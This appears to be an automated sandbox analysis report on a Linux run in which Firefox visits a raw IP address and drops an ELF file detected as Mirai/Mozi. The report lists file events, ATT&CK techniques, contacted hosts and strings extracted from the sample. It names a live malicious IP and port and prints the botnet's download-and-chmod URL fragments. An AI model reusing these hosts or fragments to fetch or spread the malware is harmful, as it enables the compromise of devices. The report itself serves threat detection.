          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/lao/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/lato/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/liberation/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/liberation2/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/lohit-assamese/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/lohit-bengali/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/lohit-devanagari/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/lohit-gujarati/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/lohit-kannada/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/lohit-malayalam/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/lohit-oriya/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/lohit-punjabi/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/lohit-tamil/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/lohit-tamil-classical/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/lohit-telugu/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/malayalam/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/noto/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/openoffice/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/padauk/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/pagul/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/samyak/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/samyak-fonts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/sinhala/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/tibetan-machine/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/tlwg/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/ttf-khmeros-core/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/truetype/ubuntu/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/type1/urw-base35/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Directory: /usr/share/fonts/X11/encodings/large/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/local/share/fonts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /home/saturnino/.local/share/fonts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /home/saturnino/.fonts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/X11/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/cMap/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/cmap/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/opentype/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/type1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/X11/Type1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/X11/encodings/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/X11/misc/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/X11/util/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/cmap/adobe-cns1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/cmap/adobe-gb1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/cmap/adobe-japan1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/cmap/adobe-japan2/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/cmap/adobe-korea1/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/opentype/malayalam/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/opentype/mathjax/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/opentype/noto/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/opentype/urw-base35/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/Gargi/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/Gubbi/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/Nakula/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/Navilu/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/Sahadeva/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/Sarai/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/abyssinica/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/ancient-scripts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/dejavu/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/droid/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/fonts-beng-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/fonts-deva-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/fonts-gujr-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/fonts-guru-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/fonts-kalapi/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/fonts-orya-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/fonts-telu-extra/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/fonts-yrsa-rasa/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/freefont/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/kacst/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/kacst-one/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/lao/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/lato/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/liberation/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/liberation2/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/lohit-assamese/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/lohit-bengali/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/lohit-devanagari/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/lohit-gujarati/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/lohit-kannada/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/lohit-malayalam/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/lohit-oriya/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/lohit-punjabi/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/lohit-tamil/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/lohit-tamil-classical/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/lohit-telugu/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/malayalam/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/noto/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/openoffice/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/padauk/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/pagul/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/samyak/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/samyak-fonts/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/sinhala/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/tibetan-machine/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/tlwg/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/ttf-khmeros-core/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/truetype/ubuntu/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/type1/urw-base35/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Directory: /usr/share/fonts/X11/encodings/large/.uuidJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Empty hidden file: /tmp/firefox/.parentlockJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Empty hidden file: /home/saturnino/.mozilla/firefox/a3xevaya.default-release/.parentlockJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Empty hidden file: /usr/lib/firefox/fonts/.uuid.TMP-LWLkmnJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Empty hidden file: /home/saturnino/.cache/mozilla/firefox/a3xevaya.default-release/.startup-incompleteJump to behavior
          Source: /usr/bin/dash (PID: 6424)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.NpJKnMbh7N /tmp/tmp.MA5wR8QSVd /tmp/tmp.zw1IYTG03iJump to behavior
          Source: /usr/bin/dash (PID: 6425)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.NpJKnMbh7N /tmp/tmp.MA5wR8QSVd /tmp/tmp.zw1IYTG03iJump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)File written: /tmp/mgmP_SRg.zip.partJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 39236 -> 40158
          Source: unknownNetwork traffic detected: HTTP traffic on port 40158 -> 39236
          Source: /usr/bin/exo-open (PID: 6239)Queries kernel information via 'uname': Jump to behavior
          Source: /usr/lib/x86_64-linux-gnu/xfce4/exo-2/exo-helper-2 (PID: 6243)Queries kernel information via 'uname': Jump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6244)Queries kernel information via 'uname': Jump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6249)Queries kernel information via 'uname': Jump to behavior
          Source: /usr/bin/dbus-launch (PID: 6290)Queries kernel information via 'uname': Jump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6332)Queries kernel information via 'uname': Jump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6390)Queries kernel information via 'uname': Jump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6451)Queries kernel information via 'uname': Jump to behavior
          Source: /usr/lib/firefox/firefox (PID: 6267)Arguments: /usr/bin/lsb_release -> /usr/bin/lsb_release -idrcJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Mirai
          Source: Yara matchFile source: /tmp/mgmP_SRg.zip.part, type: DROPPED

          Remote Access Functionality

          barindex
          Yara detected Mirai
          Source: Yara matchFile source: /tmp/mgmP_SRg.zip.part, type: DROPPED

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting          		Valid AccountsWindows Management Instrumentation1
          Scripting          		Path Interception1
          Hide Artifacts          		OS Credential Dumping1
          Security Software Discovery          		Remote ServicesData from Local System1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Hidden Files and Directories          		LSASS Memory1
          File and Directory Discovery          		Remote Desktop ProtocolData from Removable Media1
          Non-Standard Port          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          File Deletion          		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging1
          Ingress Tool Transfer          		Scheduled TransferData Encrypted for Impact

          Malware Configuration

          No configs have been found

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578347 URL: http://112.31.189.32:40158 Startdate: 19/12/2024 Architecture: LINUX Score: 96 42 112.31.189.32, 39234, 39236, 40158 CMNET-GDGuangdongMobileCommunicationCoLtdCN China 2->42 44 109.202.202.202, 80 INIT7CH Switzerland 2->44 46 24 other IPs or domains 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Antivirus detection for dropped file 2->50 52 Yara detected Mirai 2->52 54 2 other signatures 2->54 11 exo-open 2->11         started        13 dash rm 2->13         started        15 dash rm 2->15         started        signatures3 process4 process5 17 exo-open 11->17         started        process6 19 exo-open exo-helper-2 17->19         started        process7 21 exo-helper-2 sensible-browser x-www-browser firefox 19->21         started        file8 40 /tmp/mgmP_SRg.zip.part, ELF 21->40 dropped 24 firefox firefox 21->24         started        26 firefox firefox 21->26         started        28 firefox firefox 21->28         started        30 7 other processes 21->30 process9 process10 32 firefox 24->32         started        34 firefox 26->34         started        36 firefox 28->36         started        38 firefox 30->38         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          SourceDetectionScannerLabelLink
          /tmp/mgmP_SRg.zip.part100%AviraEXP/ELF.Mirai.O
          /tmp/mgmP_SRg.zip.part79%ReversingLabsLinux.Trojan.Mirai

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          star-mini.c10r.facebook.com
          		157.240.196.35
          		truefalse
            		high
            prod.balrog.prod.cloudops.mozgcp.net
            		35.244.181.201
            		truefalse
              		high
              twitter.com
              		104.244.42.193
              		truefalse
                		high
                youtube-ui.l.google.com
                		172.217.19.206
                		truefalse
                  		high
                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                  		34.117.121.53
                  		truefalse
                    		high
                    reddit.map.fastly.net
                    		151.101.193.140
                    		truefalse
                      		high
                      push.services.mozilla.com
                      		34.107.243.93
                      		truefalse
                        		high
                        dyna.wikimedia.org
                        		185.15.58.224
                        		truefalse
                          		high
                          prod.remote-settings.prod.webservices.mozgcp.net
                          		34.149.100.209
                          		truefalse
                            		high
                            www.example.com
                            		93.184.215.14
                            		truefalse
                              		high
                              prod.content-signature-chains.prod.webservices.mozgcp.net
                              		34.160.144.191
                              		truefalse
                                		high
                                telemetry-incoming.r53-2.services.mozilla.com
                                		34.120.208.123
                                		truefalse
                                  		high
                                  www.facebook.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    www.reddit.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      content-signature-2.cdn.mozilla.net
                                      		unknown
                                      		unknownfalse
                                        		high
                                        firefox.settings.services.mozilla.com
                                        		unknown
                                        		unknownfalse
                                          		high
                                          www.youtube.com
                                          		unknown
                                          		unknownfalse
                                            		high
                                            www.wikipedia.org
                                            		unknown
                                            		unknownfalse
                                              		high
                                              firefox-settings-attachments.cdn.mozilla.net
                                              		unknown
                                              		unknownfalse
                                                		high

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                https://firefox.settings.services.mozilla.com/v1/false
                                                  		high
                                                  https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftlfalse
                                                    		high
                                                    https://push.services.mozilla.com/false
                                                      		high
                                                      http://112.31.189.32:40158/true
                                                        		unknown
                                                        https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-USfalse
                                                          		high
                                                          https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2021-09-19-15-17-11.chainfalse
                                                            		high

                                                            URLs from Memory and Binaries

                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://www.google.com/policies/privacy/scriptCache-new.bin.42.drfalse
                                                              		high
                                                              https://settings.stage.mozaws.net/v1/buckets/main-preview/collections/search-config/recordsscriptCache-new.bin.42.drfalse
                                                                		unknown
                                                                http://%s:%d/bin.sh;chmodmgmP_SRg.zip.part.42.drfalse
                                                                  		high
                                                                  https://support.mozilla.org/kb/scriptCache-new.bin.42.drfalse
                                                                    		high
                                                                    http://%s:%d/Mozi.a;chmodmgmP_SRg.zip.part.42.drfalse
                                                                      		high
                                                                      https://yandex.comscriptCache-new.bin.42.drfalse
                                                                        		high
                                                                        http://%s:%d/Mozi.m;$mgmP_SRg.zip.part.42.drfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/soap/envelope/mgmP_SRg.zip.part.42.drfalse
                                                                            		high
                                                                            https://trr.dns.nextdns.io/scriptCache-new.bin.42.drfalse
                                                                              		unknown
                                                                              https://bugzilla.mozilla.org/show_bug.cgi?id=921157scriptCache-new.bin.42.drfalse
                                                                                		high
                                                                                https://developer.mozilla.org/en-US/docs/JavaScript_OS.File/OS.File.Info#Cross-platform_AttributesscriptCache-new.bin.42.drfalse
                                                                                  		high
                                                                                  http://%s:%d/Mozi.mmgmP_SRg.zip.part.42.drfalse
                                                                                    		high
                                                                                    https://private.canadianshield.cira.ca/dns-query3870112724rsegmnoittet-es.sqlite.42.dr, 3870112724rsegmnoittet-es.sqlite-wal.42.drfalse
                                                                                      		high
                                                                                      http://mozilla.org/MPL/2.0/.asrouter.ftl.tmp.42.dr, 37373F56CBD822F5FCF64BA01E1320A0924D8460.42.drfalse
                                                                                        		high
                                                                                        https://bugzilla.mozilla.org/show_bug.cgi?id=1238180scriptCache-new.bin.42.drfalse
                                                                                          		high
                                                                                          https://ebay.comscriptCache-new.bin.42.drfalse
                                                                                            		high
                                                                                            https://www.openh264.org/scriptCache-new.bin.42.drfalse
                                                                                              		high
                                                                                              http://pki.goog/repo/certs/gtsr1.der04cert9.db-journal.42.dr, cert9.db.42.drfalse
                                                                                                		high
                                                                                                https://firefox.dns.next3870112724rsegmnoittet-es.sqlite.42.dr, 3870112724rsegmnoittet-es.sqlite-wal.42.drfalse
                                                                                                  		unknown
                                                                                                  https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingsscriptCache-new.bin.42.drfalse
                                                                                                    		high
                                                                                                    http://112.31.189.32:40158/predictor::seen1D761C4E3CD44B794FCD52C88CEC268E12BE3D053.42.drfalse
                                                                                                      		unknown
                                                                                                      https://twitter.comscriptCache-new.bin.42.drfalse
                                                                                                        		high
                                                                                                        http://%s:%d/bin.shmgmP_SRg.zip.part.42.drfalse
                                                                                                          		high
                                                                                                          http://x1.c.lencr.org/0cert9.db-journal.42.dr, cert9.db.42.drfalse
                                                                                                            		high
                                                                                                            http://x1.i.lencr.org/0cert9.db-journal.42.dr, cert9.db.42.drfalse
                                                                                                              		high
                                                                                                              https://firefox.dns.nextdns.io/scriptCache-new.bin.42.drfalse
                                                                                                                		high
                                                                                                                http://%s:%d/Mozi.m;mgmP_SRg.zip.part.42.drfalse
                                                                                                                  		high
                                                                                                                  https://remote-settings.readthedocs.ioF8CBD54DDA10F4286A41EC6A537240712D6C2308.42.drfalse
                                                                                                                    		unknown
                                                                                                                    http://%s:%d/Mozi.a;sh$mgmP_SRg.zip.part.42.drfalse
                                                                                                                      		high
                                                                                                                      https://profiler.firefox.comscriptCache-new.bin.42.drfalse
                                                                                                                        		high
                                                                                                                        http://json-schema.org/draft-04/schema#scriptCache-new.bin.42.drfalse
                                                                                                                          		high
                                                                                                                          https://mozilla.cloudflare-dns.com/dns-query3870112724rsegmnoittet-es.sqlite.42.dr, 3870112724rsegmnoittet-es.sqlite-wal.42.drfalse
                                                                                                                            		high
                                                                                                                            http://schemas.xmlsoap.org/soap/encoding/mgmP_SRg.zip.part.42.drfalse
                                                                                                                              		high
                                                                                                                              https://doh.xfinity.com/dns-query3870112724rsegmnoittet-es.sqlite.42.dr, 3870112724rsegmnoittet-es.sqlite-wal.42.drfalse
                                                                                                                                		high
                                                                                                                                https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/254256B27E0C48CF9B80B695F0B3B8CA84610495.42.drfalse
                                                                                                                                  		high
                                                                                                                                  http://kinto.readthedocs.io/en/latest/tutorials/synchronisation.html#polling-for-remote-changesF8CBD54DDA10F4286A41EC6A537240712D6C2308.42.drfalse
                                                                                                                                    		unknown
                                                                                                                                    https://www.widevine.com/scriptCache-new.bin.42.drfalse
                                                                                                                                      		high
                                                                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0cert9.db-journal.42.dr, cert9.db.42.drfalse
                                                                                                                                        		high
                                                                                                                                        https://settings.stage.mozaws.net/v1/buckets/main/collections/search-config/recordsscriptCache-new.bin.42.drfalse
                                                                                                                                          		unknown
                                                                                                                                          http://crl.pki.goog/gtsr1/gtsr1.crl0Wcert9.db-journal.42.dr, cert9.db.42.drfalse
                                                                                                                                            		high
                                                                                                                                            https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsscriptCache-new.bin.42.drfalse
                                                                                                                                              		high
                                                                                                                                              http://ocsp.rootca1.amazontrust.com0:cert9.db-journal.42.dr, cert9.db.42.drfalse
                                                                                                                                                		high
                                                                                                                                                https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causesscriptCache-new.bin.42.drfalse
                                                                                                                                                  		high
                                                                                                                                                  http://127.0.0.1mgmP_SRg.zip.part.42.drfalse
                                                                                                                                                    		high
                                                                                                                                                    http://baidu.com/%s/%s/%d/%s/%s/%s/%s)mgmP_SRg.zip.part.42.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://pki.goog/repository/0cert9.db-journal.42.dr, cert9.db.42.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://firefox.settings.services.mozilla.com/v1scriptCache-new.bin.42.drfalse
                                                                                                                                                          		high
                                                                                                                                                          http://127.0.0.1sendcmdmgmP_SRg.zip.part.42.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-37373F56CBD822F5FCF64BA01E1320A0924D8460.42.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://duckduckgo.comscriptCache-new.bin.42.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordsscriptCache-new.bin.42.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://github.com/Kinto/kinto-attachment/F8CBD54DDA10F4286A41EC6A537240712D6C2308.42.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://ipinfo.io/ipmgmP_SRg.zip.part.42.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://%s:%d/Mozi.m;/tmp/Mozi.mmgmP_SRg.zip.part.42.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://amazon.comscriptCache-new.bin.42.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://purenetworks.com/HNAP1/mgmP_SRg.zip.part.42.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?cert9.db-journal.42.dr, cert9.db.42.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helpscriptCache-new.bin.42.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://firefox-settings-attachments.cdn.mozilla.net/F8CBD54DDA10F4286A41EC6A537240712D6C2308.42.drfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://support.mozilla.org/kb/flash-protected-mode-autodisabledscriptCache-new.bin.42.drfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://HTTP/1.1mgmP_SRg.zip.part.42.drfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://crl.pki.goog/gsr2/gsr2.crl0?cert9.db-journal.42.dr, cert9.db.42.drfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://google.comscriptCache-new.bin.42.drfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5scriptCache-new.bin.42.drfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://schemas.xmlsoap.org/soap/envelope//mgmP_SRg.zip.part.42.drfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/recoscriptCache-new.bin.42.drfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2025FFD69415953BE9CE9C07B2E9C26DA959ADEA6CB.42.drfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://baidu.comscriptCache-new.bin.42.drfalse
                                                                                                                                                                                                    		high

                                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                                    Public IPs

                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
